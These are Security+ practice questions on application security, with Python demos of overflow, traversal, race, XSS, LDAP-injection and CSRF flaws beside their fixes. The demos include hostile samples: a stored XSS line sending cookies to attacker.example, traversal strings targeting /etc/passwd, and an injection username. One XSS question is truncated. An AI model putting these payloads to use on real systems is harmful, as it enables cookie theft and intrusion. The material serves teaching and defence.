CompTIA Security+ - Lesson 14: Summarizing Secure Application Concepts (Practice Questions)


Which of the following is a common solution that protects an application from behaving in an unexpected way when passing invalid data through an attack? A. Buffer overflow B. Race conditions C. Zero-day exploit D. Input Validation

Input Validation Explanation: Unvalidated input is a primary vector for attacking applications. If the application does not check that what it receives is valid, an attacker can submit commands in place of data, for example a query against the back-end database, and obtain confidential data.

A threat analyst is asked about malicious code indicators. Which indicator allows the threat actor's backdoor to restart if the host reboots or the user logs off? A. Persistence B. Credential dumping C. Shellcode D. Lateral movement/inside attacker

Persistence Explanation: Persistence is a mechanism that allows the threat actor's backdoor to restart if the host reboots or the user logs off. Typical methods are using AutoRun keys in the registry or adding a scheduled task.

Which scripting language is the preferred method of performing Windows administration tasks? A. JavaScript B. Python C. Ruby D. PowerShell

PowerShell Explanation: PowerShell is the preferred method of performing Windows administration tasks.

Which malicious code indicator is a minimal program designed to exploit a buffer overflow? A. Credential dumping B. Persistence C. Lateral movement/insider attack D. Shellcode

Shellcode Explanation: Shellcode is a minimal program designed to exploit a buffer overflow or similar vulnerability to gain privileges, or to drop a backdoor on the host if run as a Trojan.

Which scenario best describes provisioning? A. A developer removes an application from packages or instances. B. A developer deploys an application to the target environment. C. A developer sets up ID system for each iteration of a software product. D. A developer commits and tests updates.

A developer deploys an application to the target environment. Explanation: Provisioning is the process of deploying an application to the target environment. An enterprise provisioning manager might assemble multiple applications in a package.

Analyze types of vulnerabilities and summarize a zero-day exploit. A. A design flaw that can cause the application security system to be circumvented. B. A vulnerability that is capitalized on before the developer knows about it. C. An attack that passes invalid data to an application. D. An attack that passes data to deliberately overflow the buffer, that the application reserves to store the expected data.

A vulnerability that is capitalized on before the developer knows about it. Explanation: A zero-day exploit takes advantage of a vulnerability before the developer knows about it or can release a patch to address it. These can be extremely destructive, as it can take the vendor a long time to develop a patch.

A system administrator is working to restore a system affected by a stack overflow. Analyze the given choices and determine which overflow vulnerability the attacker exploited. A. An attacker changes the return address of an area of memory used by a program subroutine. B. An attacker overwrites an area of memory allocated by an application to store variables. C. An attacker exploits unsecure code with more values than an array expects. D. An attacker causes the target software to calculate a value that exceeds the set bounds.

An attacker changes the return address of an area of memory used by a program subroutine. Explanation: A stack is an area of memory used by a program subroutine. It includes a return address, which is the location in the program that called the subroutine. An attacker could use a buffer overflow to overwrite the return address; this is called a stack overflow.
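To make the "return address" answer concrete, here is an added example (not from the study set) that models one stack frame as a byte array: the local buffer sits below the saved frame pointer and the return address, so an unbounded copy that runs past the buffer lands on the return slot. The layout, the sizes and the two addresses are assumptions chosen for illustration, not real gadget addresses; the copy is clamped to the frame only so the model stays in bounds, which is exactly what a real stack would not do.

```python
import struct
from typing import Tuple

BUF_SIZE = 8                        # bytes reserved for the local buffer
WORD = 8                            # size of a saved pointer on a 64-bit stack
FRAME_SIZE = BUF_SIZE + 2 * WORD    # buffer | saved frame pointer | return address
RET_OFFSET = BUF_SIZE + WORD        # where the return address lives in the frame


class Frame:
    """Toy model of a stack frame (assumed layout, not a real CPU stack)."""

    def __init__(self, legit_return: int) -> None:
        self.mem = bytearray(FRAME_SIZE)
        self.mem[RET_OFFSET:RET_OFFSET + WORD] = struct.pack("<Q", legit_return)

    def return_address(self) -> int:
        return struct.unpack("<Q", self.mem[RET_OFFSET:RET_OFFSET + WORD])[0]


def unsafe_copy(frame: Frame, data: bytes) -> None:
    """Models strcpy()/gets(): copies every byte with no length check.
    Clamped to the frame purely so the model stays defined; real code
    would keep writing into the caller's frame."""
    n = min(len(data), FRAME_SIZE)
    frame.mem[0:n] = data[:n]


def safe_copy(frame: Frame, data: bytes) -> bool:
    """Bounded copy: refuses anything that does not fit the buffer."""
    if len(data) > BUF_SIZE:
        return False
    frame.mem[0:len(data)] = data
    return True


def build_payload(attacker_return: int) -> bytes:
    """Constructed attacker input: filler for the buffer, junk over the saved
    frame pointer, then the address the attacker wants execution to return
    to. The values are illustrative, not addresses from any real binary."""
    return b"A" * BUF_SIZE + b"B" * WORD + struct.pack("<Q", attacker_return)


def run_unsafe(legit_return: int, attacker_return: int) -> int:
    """Return address left in the frame after the unbounded copy."""
    frame = Frame(legit_return)
    unsafe_copy(frame, build_payload(attacker_return))
    return frame.return_address()


def run_safe(legit_return: int, attacker_return: int) -> Tuple[bool, int]:
    """(accepted?, return address) after the bounded copy."""
    frame = Frame(legit_return)
    accepted = safe_copy(frame, build_payload(attacker_return))
    return accepted, frame.return_address()


if __name__ == "__main__":
    legit, evil = 0x401136, 0xDEADBEEF
    print(f"unbounded copy -> return address 0x{run_unsafe(legit, evil):x}")
    ok, ret = run_safe(legit, evil)
    print(f"bounded copy   -> accepted={ok}, return address 0x{ret:x}")
```

The point to take from the model is that the overflow never has to touch the return address deliberately; it only has to keep writing. Every mitigation named in this lesson (bounds checks, stack canaries, non-executable stacks, ASLR) attacks one of the steps between "extra bytes land on the frame" and "the CPU jumps to the attacker's value".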

Code developers de-conflict coding with one another during which phase of the software development life cycle (SDLC)? A. Continuous integration B. Continuous delivery C. Continuous validation D. Continuous monitoring

Continuous integration Explanation: Continuous integration (CI) is the principle that developers should commit and test updates often. CI aims to detect and resolve coding conflicts early.

Which type of attack disguises the nature of malicious input, preventing normalization from stripping illegal characters? A. Fuzzing B. Canonicalization C. Code reuse D. Code signing

Canonicalization Explanation: The threat actor might use a canonicalization attack to disguise the nature of the malicious input. Canonicalization refers to the way the server converts the different forms in which a resource (such as a file path or URL) may be represented and submitted into the single simplest (canonical) form it uses to process the input. If validation runs on the raw input rather than on the canonical form, an encoded version of a forbidden sequence can get through.
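The input-validation and canonicalization questions above are two halves of one rule: validate the canonical form, never the raw bytes. The following is an added example, not from the study set, that shows a naive filter on the raw request path being bypassed by URL encoding and double encoding, beside a check that decodes and normalises first. The document root `/var/www/static` and the sample paths are constructed for the example.

```python
import posixpath
from urllib.parse import unquote

# Assumed document root for this example; any absolute directory works.
WEB_ROOT = "/var/www/static"


def naive_is_safe(user_path: str) -> bool:
    """Validation applied to the raw request string: rejects the literal
    '../' and nothing else. Encoded forms of the same sequence slip past."""
    return "../" not in user_path


def canonicalize(user_path: str) -> str:
    """Reduce the input to one canonical absolute path before any check:
    percent-decode until the string stops changing (defeats double
    encoding such as %252e), then collapse '.', '..' and repeated slashes."""
    decoded = user_path
    for _ in range(4):                      # bounded: stop once decoding is stable
        nxt = unquote(decoded)
        if nxt == decoded:
            break
        decoded = nxt
    joined = posixpath.join(WEB_ROOT, decoded.lstrip("/"))
    return posixpath.normpath(joined)


def canonical_is_safe(user_path: str) -> bool:
    """Validate the canonical form, not the bytes the client sent."""
    resolved = canonicalize(user_path)
    return resolved == WEB_ROOT or resolved.startswith(WEB_ROOT + "/")


# Constructed request paths: one benign, then the same traversal attempt in
# plain, single-encoded and double-encoded form.
SAMPLES = [
    "css/site.css",
    "../../etc/passwd",
    "..%2F..%2Fetc%2Fpasswd",
    "%252e%252e%252f%252e%252e%252fetc%252fpasswd",
]

if __name__ == "__main__":
    for p in SAMPLES:
        print(f"{p:48} naive={naive_is_safe(p)!s:5} "
              f"canonical={canonical_is_safe(p)!s:5} -> {canonicalize(p)}")
```

Only the plain `../../etc/passwd` is caught by the naive filter; both encoded forms pass it and still resolve to `/var/etc/passwd` once canonicalised. Real handlers should resolve against the filesystem (symlinks included) rather than with `posixpath` alone, but the ordering is the same: decode and normalise, then validate.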

Which method might an attacker use to redirect login attempts via information gained by implementing JavaScript on a webpage the user believes is legitimate? A. Man-in-the-Browser (MitB) B. Confused deputy C. Reflected D. Clickjacking

Clickjacking Explanation: Clickjacking is an attack characterized by the difference between what a user sees and trusts (a web application's login page or form) and the reality: the page or form contains a malicious layer or invisible iframe, allowing an attacker to intercept or redirect user input.

Which of the following statements differentiates between input validation and output encoding? A. Input validation ensures that data input into an application is in a compatible format for the application, while output encoding re-encodes data that transfers between scripts. B. Input validation is a server-side validation method, while output encoding is a client-side validation method. C. Output encoding is a server-side validation method, while input validation encoding is a client-side validation method. D. Input validation forces the browser to connect using HTTPS only, while output encoding sets whether the browser can cache responses.

Input validation ensures that data input into an application is in a compatible format for the application, while output encoding re-encodes data that transfers between scripts. Explanation: Input validation ensures that an application can appropriately handle the data entered into a field or variable in the application. Output encoding is applied when a script passes data to another script or writes it into an output context such as HTML: characters that have special meaning in that context are re-encoded so that the data cannot be interpreted as "script" contents.

A hacker compromises a web browser and uses access to harvest credentials users input when logging in to banking websites. What type of attack has occurred? A. Evil twin B. Man-in-the-Browser C. Session hijacking D. Clickjacking

Man-in-the-Browser Explanation: A man-in-the-browser (MitB) attack compromises the web browser. An attacker may be able to inspect session cookies, certificates, and data, change browser settings, perform redirection, and inject code.

A network user calls the help desk after receiving an error message. The caller complains that the error message does not indicate whether the username or password input was incorrect but simply states there was an authentication error. What does this situation illustrate? A. Minimizing data exposure B. Dynamic code analysis C. Effective exception handling D. Web application validation

Minimizing data exposure Explanation: Data exposure is a fault that allows privileged information (such as a token, password, or personal data) to be read without being subject to the appropriate access controls. A generic "authentication error" message avoids confirming to an attacker which usernames exist.

Identify the type of attack that occurs when the outcome of an execution process is directly dependent on the order and timing of certain events, and those events fail to execute in the order and timing intended by the developer. A. Stack overflow B. Integer overflow C. Race conditions D. Dynamic Link Library (DLL) injection

Race conditions Explanation: Race conditions occur when the outcome of an execution process is directly dependent on the order and timing of certain events, and those events fail to execute in the order and timing intended by the developer. A common form is time-of-check to time-of-use (TOCTOU), where a value is checked and then used as two separate steps.
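An added example of the race described above, not from the study set: a toy account whose withdrawal checks the balance and then debits it as two separate steps, run from two threads at once, beside the same operation made atomic with a lock. The `threading.Barrier` in the racy path is an assumption of the example, a deterministic stand-in for the scheduler interleaving an attacker would otherwise have to hit by repetition.

```python
import threading
from typing import Callable, List, Tuple


class Account:
    """Toy account used to show a time-of-check/time-of-use race."""

    def __init__(self, balance: int) -> None:
        self.balance = balance
        self._lock = threading.Lock()

    def withdraw_racy(self, amount: int, window: threading.Barrier) -> bool:
        if self.balance >= amount:          # time of check
            # Both threads are held here until each has passed the check;
            # real code has no barrier, just a gap the attacker races for.
            window.wait()
            self.balance -= amount          # time of use
            return True
        return False

    def withdraw_locked(self, amount: int) -> bool:
        with self._lock:                    # check and debit cannot interleave
            if self.balance >= amount:
                self.balance -= amount
                return True
            return False


def _run_concurrently(workers: List[Callable[[], bool]]) -> List[bool]:
    results: List[bool] = []
    threads = [threading.Thread(target=lambda w=w: results.append(w())) for w in workers]
    for t in threads:
        t.start()
    for t in threads:
        t.join()
    return sorted(results)


def race_unprotected(start: int, amount: int) -> Tuple[int, List[bool]]:
    """Two concurrent withdrawals of `amount` from a balance of `start`
    through the racy path. Returns (final balance, sorted outcomes)."""
    acct = Account(start)
    window = threading.Barrier(2)
    results = _run_concurrently([lambda: acct.withdraw_racy(amount, window)] * 2)
    return acct.balance, results


def race_protected(start: int, amount: int) -> Tuple[int, List[bool]]:
    """Same two withdrawals through the locked path."""
    acct = Account(start)
    results = _run_concurrently([lambda: acct.withdraw_locked(amount)] * 2)
    return acct.balance, results


if __name__ == "__main__":
    print("unprotected:", race_unprotected(150, 100))   # both succeed, balance goes negative
    print("protected:  ", race_protected(150, 100))     # one rejected, balance stays >= 0
```

With a balance of 150 and two withdrawals of 100, the racy version lets both succeed and ends at -50; the locked version rejects one and ends at 50. The same shape appears in file handling (`access()` then `open()`), coupon redemption and privilege checks, and the fix is always the same: make the check and the use one indivisible operation.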

A security analyst is assessing the security of their company's web application. They have determined multiple occurrences of XSS attacks and need to identify what type of XSS attacks occurred in order to apply the proper remediation. Which of the following accurately distinguishes between Reflected XSS, Stored XSS, and DOM XSS attacks? A. Reflected XSS attacks exploit client-side scripts by capturing user input and reflecting it back to the client, while Stored XSS attacks exploit vulnerabilities in client-side scripts by storing malicious code in a database. DOM XSS attacks exploit vulnerabilities in server-side scripts by manipulating the Document Object Model (DOM). B. Reflected XSS attacks exploit server-side scripts by capturing user input and reflecting it back to the client, while Stored XSS attacks exploit vulnerabilities in server-side scripts by storing malicious code in a database. DOM XSS attacks exploit vulnerabilities in client-side scripts by manipulating the Document Object Model (DOM). C. Reflected XSS attacks exploit client-side scripts by capturing user input and reflecting it back to the client, while Stored XSS attacks exploit vulnerabilities in server-side scripts

Reflected XSS attacks exploit server-side scripts by capturing user input and reflecting it back to the client, while Stored XSS attacks exploit vulnerabilities in server-side scripts by storing malicious code in a database. DOM XSS attacks exploit vulnerabilities in client-side scripts by manipulating the Document Object Model (DOM). Explanation: There are three types of XSS attacks - Reflected XSS attacks exploit server-side scripts by capturing user input and reflecting it back to the client, Stored XSS attacks exploit vulnerabilities in server-side scripts by storing malicious code in a database, and DOM XSS attacks exploit vulnerabilities in client-side scripts by manipulating the Document Object Model (DOM).
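The output-encoding question and the XSS question above are connected: reflected and stored XSS are both fixed on the server by encoding at the point of output, while DOM XSS is not, because its sink is client-side script. The following added example, not from the study set, renders a search page (reflected) and a comment list (stored) with and without `html.escape`. The comment store and the query string are constructed sample data.

```python
from html import escape
from urllib.parse import parse_qs

# Constructed comment store standing in for a database table. The second row
# is a stored XSS payload submitted by an earlier visitor.
COMMENTS_DB = [
    "Nice article!",
    "<script>new Image().src='https://attacker.example/c?'+document.cookie</script>",
]


def _query_param(query_string: str, name: str) -> str:
    return parse_qs(query_string).get(name, [""])[0]


def render_search_unsafe(query_string: str) -> str:
    """Reflected XSS: the q parameter is copied straight into the response."""
    return f"<p>Results for: {_query_param(query_string, 'q')}</p>"


def render_search_safe(query_string: str) -> str:
    """Same page with output encoding: characters that mean something in
    HTML (< > & \" ') are re-encoded as entities at the point of output."""
    return f"<p>Results for: {escape(_query_param(query_string, 'q'), quote=True)}</p>"


def render_comments_unsafe(db) -> str:
    """Stored XSS: the payload saved earlier is served to every later visitor."""
    return "<ul>" + "".join(f"<li>{c}</li>" for c in db) + "</ul>"


def render_comments_safe(db) -> str:
    return "<ul>" + "".join(f"<li>{escape(c, quote=True)}</li>" for c in db) + "</ul>"


def has_live_script_tag(html: str) -> bool:
    """Crude marker used only to show whether a browser would parse a real
    <script> element out of the response."""
    return "<script" in html.lower()


if __name__ == "__main__":
    qs = "q=%3Cscript%3Ealert(document.cookie)%3C%2Fscript%3E"
    for name, html in [("reflected/unsafe", render_search_unsafe(qs)),
                       ("reflected/safe", render_search_safe(qs)),
                       ("stored/unsafe", render_comments_unsafe(COMMENTS_DB)),
                       ("stored/safe", render_comments_safe(COMMENTS_DB))]:
        print(f"{name:17} script executes={has_live_script_tag(html)!s:5} {html}")
```

Note that the stored payload was never "validated away": input validation on the comment form may legitimately have to accept angle brackets. Encoding on output is what makes the stored and reflected cases safe, and it must match the context (HTML body here; attribute, JavaScript and URL contexts each need their own encoder). For DOM XSS the equivalent fix lives in the client script, for instance writing untrusted values with `textContent` rather than `innerHTML`.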

Evaluate the Agile paradigm within a Software Development Lifecycle (SDLC) to determine which statement demonstrates the idea of continuous tasks. A. Devising an application's initial scope and vision for the project B. Prioritizing the requirements and work through the cycles of designing, developing, and testing C. Releasing well-tested code in smaller blocks D. Perform the final integration and testing of the solution

Releasing well-tested code in smaller blocks Explanation: Agile development flips the waterfall model by iterating through phases concurrently on smaller modules of code. In this model, development and provisioning tasks are conceived as continuous.

An attacker compromises a Linux host, installing a web shell as a backdoor. If the attacker gained access to the host through a connection the host established, what type of attack has occurred? A. Man-in-the-Browser (MitB) B. Reverse shell C. Rootkit D. Session hijacking

Reverse shell Explanation: A reverse shell is a common attack vector against a Linux host, where the victim host opens an outbound connection to the attacking host and gives the attacker a remote command shell over it. Because the connection is initiated from inside, it often passes firewall rules that only block inbound connections.

Which cookie attribute can a security admin configure to help mitigate a request forgery attack? A. Secure B. HttpOnly C. SameSite D. Cache-Control

SameSite Explanation: Cookies can be a vector for session hijacking and data exposure if not configured correctly. Use the SameSite attribute to control where a cookie may be sent, mitigating request forgery attacks.

A system administrator suspects a memory leak is occurring on a client. Determine which scenario would justify this finding. A. A rapid decrease in disk space has been logged. B. High page file utilization has been logged. C. High memory utilization during scheduled backups after-hours. D. Software does not release allocated memory when it is done with it.

Software does not release allocated memory when it is done with it. Explanation: A memory leak occurs when a process allocates memory without subsequently freeing it, which a worm or other type of malware can cause. Looking for decreasing available bytes and increasing committed bytes over time can detect this type of memory leak.

An attacker finds a way to exploit a vulnerability in a target application that allows the attacker to bypass a password requirement. Which method did the attacker most likely use? A. The attacker added LDAP filters as unsanitized input by creating a condition that is always true. B. The attacker inserted code into a back-end database by submitting a post to a bulletin board with a malicious script embedded in the message. C. The attacker embedded a request for a local resource via XML with no encryption. D. The attacker modified a basic SQL function, adding code to some input that an app accepts, causing it to execute the attacker's query.

The attacker added LDAP filters as unsanitized input by creating a condition that is always true. Explanation: An attacker could exploit the vulnerability with an LDAP injection attack: by inserting the (&) operator, which is an always-true filter, into unsanitized input, the attacker closes the name=value assertion early and leaves the password filter outside the part of the filter that is evaluated.
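An added example of the LDAP injection described above, not from the study set. It builds a login filter by string concatenation beside one that escapes values per RFC 4515, and shows which part of each filter a server that stops at the first balanced expression would evaluate. The filter shape `(&(uid=...)(userPassword=...))`, the injected username and the assumption that trailing text after the first complete filter is ignored (true of many servers, not all) are all assumptions of the example.

```python
# RFC 4515 escaping for values placed inside an LDAP search filter.
_FILTER_ESCAPES = {"\\": r"\5c", "*": r"\2a", "(": r"\28", ")": r"\29", "\x00": r"\00"}


def escape_filter_value(value: str) -> str:
    """Escape the characters that would otherwise act as filter syntax."""
    return "".join(_FILTER_ESCAPES.get(ch, ch) for ch in value)


def login_filter_unsafe(username: str, password: str) -> str:
    """Filter built by concatenation: attacker-controlled text becomes syntax."""
    return f"(&(uid={username})(userPassword={password}))"


def login_filter_safe(username: str, password: str) -> str:
    """Every user-supplied value is escaped, so it can only be compared as data."""
    return (f"(&(uid={escape_filter_value(username)})"
            f"(userPassword={escape_filter_value(password)}))")


def first_complete_filter(filter_text: str) -> str:
    """Return the first balanced filter expression. Servers that evaluate only
    this part and ignore trailing text are what make the injection below work;
    behaviour varies by implementation (assumption of this example)."""
    depth = 0
    for i, ch in enumerate(filter_text):
        if ch == "(":
            depth += 1
        elif ch == ")":
            depth -= 1
            if depth == 0:
                return filter_text[: i + 1]
    return filter_text


# Constructed attack input: closes the uid assertion, appends (&) (absolute
# TRUE per RFC 4526), then closes the outer AND so the password assertion is
# left outside the evaluated filter.
INJECTED_USER = "admin)(&))"
PASSWORD_GUESS = "wrong"

if __name__ == "__main__":
    unsafe = login_filter_unsafe(INJECTED_USER, PASSWORD_GUESS)
    safe = login_filter_safe(INJECTED_USER, PASSWORD_GUESS)
    print("unsafe full      :", unsafe)
    print("unsafe evaluated :", first_complete_filter(unsafe))
    print("safe full        :", safe)
    print("safe evaluated   :", first_complete_filter(safe))
```

In the unsafe case the evaluated filter is `(&(uid=admin)(&))`, which matches the admin entry regardless of password; in the safe case the parentheses in the username are encoded as `\28` and `\29`, the whole filter stays balanced, and the password assertion is still part of what gets evaluated. Binding as the user with the supplied password, rather than comparing `userPassword` in a filter at all, is the stronger design where the directory allows it.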

A threat actor programs an attack designed to invalidate memory locations to crash target systems. Which statement best describes the nature of this attack? A. The attacker created a null pointer file to conduct a dereferencing attack. B. The attacker programmed a dereferencing attack. C. The attacker programmed a null pointer dereferencing exception. D. The attacker created a race condition to perform a null pointer dereferencing attack.

The attacker programmed a null pointer dereferencing exception. Explanation: A pointer variable stores a memory address; dereferencing is reading or writing the memory at that address via the pointer. If the address is invalid or null, this creates a null pointer dereference exception and the process may crash.

An employee is attempting to install new software they believe will help them perform their duties faster. When the employee tries to install the software, an error message is received, stating they are not authorized to install the software. The employee calls the help desk for assistance. Evaluate the principles of execution control to conclude what has most likely occurred in this scenario. A. The company is utilizing allow list control, and the software is included in the list. B. The software is malicious, and execution control has identified the virus and is blocking the installation. C. The company is utilizing allow list control, and the software is not included in the list. D. The company is utilizing block list control, and the software is not included in the list.

The company is utilizing allow list control, and the software is not included in the list. Explanation: It is likely that the company is using allow list control, and the software is not on the approved allow list. Any software not listed will be blocked from running. If the company were using a block list, the software would be able to run as long as it is not on the prohibited list: a block list only blocks software that has been listed.

A software developer is seeking ways to streamline the coding process securely. Which of the following is true of secure code usage? A. Code reuse is a risk-free approach B. Stored procedures are a less-secure method of querying a database C. Software development kits (SDK) contain code that can be trusted D. Third-party libraries must be monitored for vulnerabilities

Third-party libraries must be monitored for vulnerabilities Explanation: A third-party library is a binary package (such as a dynamic link library) that implements some sort of standard functionality, such as establishing a network connection or performing cryptography. Each library must be monitored for vulnerabilities and patched promptly.

Analyze the following statements and select the statement which correctly explains the difference between cross-site scripting (XSS) and cross-site request forgery (XSRF). A. XSRF spoofs a specific request against the web application, while XSS is a means of running any arbitrary code. B. XSS is not an attack vector, but the means by which an attacker can perform XSRF, the attack vector. C. XSRF requires a user to click an embedded malicious link, whereas the attacker embeds an XSS attack in the document object module (DOM) script. D. XSRF is a server-side exploit, while XSS is a client-side exploit.

XSRF spoofs a specific request against the web application, while XSS is a means of running any arbitrary code. Explanation: A client-side or cross-site request forgery (CSRF or XSRF) exploits applications that use cookies to authenticate users and track sessions: the browser attaches the victim's cookie to a request the attacker crafted. XSS exploits the browser's trust in the site and can be used to perform an XSRF attack, among other things.
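The cookie question and the XSRF question above describe the two layers of a request-forgery defence: a cookie attribute that stops the browser attaching the session cookie to cross-site requests, and a per-session token the forging page cannot read. The following added example, not from the study set, emits a weak and a hardened `Set-Cookie` value with the standard library and implements an HMAC-bound anti-forgery token. The server secret, the session id and the `handle_transfer` handler are assumptions of the example.

```python
import hashlib
import hmac
import secrets
from http.cookies import SimpleCookie

# Assumed per-deployment secret; a real service loads it from a key store,
# not source. It only has to stay stable for the life of the sessions.
SERVER_SECRET = secrets.token_bytes(32)


def session_cookie_weak(session_id: str) -> str:
    """Set-Cookie value with no attributes: sent on cross-site requests,
    over plain HTTP, and readable by page script."""
    jar = SimpleCookie()
    jar["session"] = session_id
    return jar["session"].OutputString()


def session_cookie_hardened(session_id: str) -> str:
    """SameSite keeps the browser from attaching the cookie to requests that
    originate from another site, which is what a forged request relies on."""
    jar = SimpleCookie()
    jar["session"] = session_id
    morsel = jar["session"]
    morsel["path"] = "/"
    morsel["secure"] = True        # HTTPS only
    morsel["httponly"] = True      # hidden from document.cookie (limits theft via XSS)
    morsel["samesite"] = "Strict"  # "Lax" if top-level navigation must carry it
    return morsel.OutputString()


def csrf_token(session_id: str) -> str:
    """Anti-forgery token bound to the session: HMAC over the session id, so
    the server stores nothing and a token for one session is useless for
    another."""
    return hmac.new(SERVER_SECRET, session_id.encode(), hashlib.sha256).hexdigest()


def verify_csrf(session_id: str, submitted: str) -> bool:
    return hmac.compare_digest(csrf_token(session_id), submitted)


def handle_transfer(cookie_session_id: str, form_token: str) -> bool:
    """State-changing handler. A forged cross-site request arrives with the
    victim's cookie (so the session is valid) but the attacking page cannot
    read the token the legitimate form embeds, so the check fails."""
    if not verify_csrf(cookie_session_id, form_token):
        return False
    # ... perform the transfer ...
    return True


if __name__ == "__main__":
    sid = "7f3b9c1e2a"
    print("weak     :", session_cookie_weak(sid))
    print("hardened :", session_cookie_hardened(sid))
    print("legit    :", handle_transfer(sid, csrf_token(sid)))
    print("forged   :", handle_transfer(sid, ""))      # attacker page has no token
```

The hardened value comes out as `session=7f3b9c1e2a; HttpOnly; Path=/; SameSite=Strict; Secure`. Use both layers: `SameSite` depends on browser support and on the cookie never being needed cross-site, while the token works everywhere but only if every state-changing endpoint actually checks it.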

Which of the following is NOT a scripting language? A. regex B. PowerShell C. JavaScript D. Python

regex Explanation: Automated or procedural scripting languages take standard arguments as data, so there is less scope for uncertainty over configuration choices leading to errors. A domain-specific language (DSL) performs a particular task, such as regex string parsing.
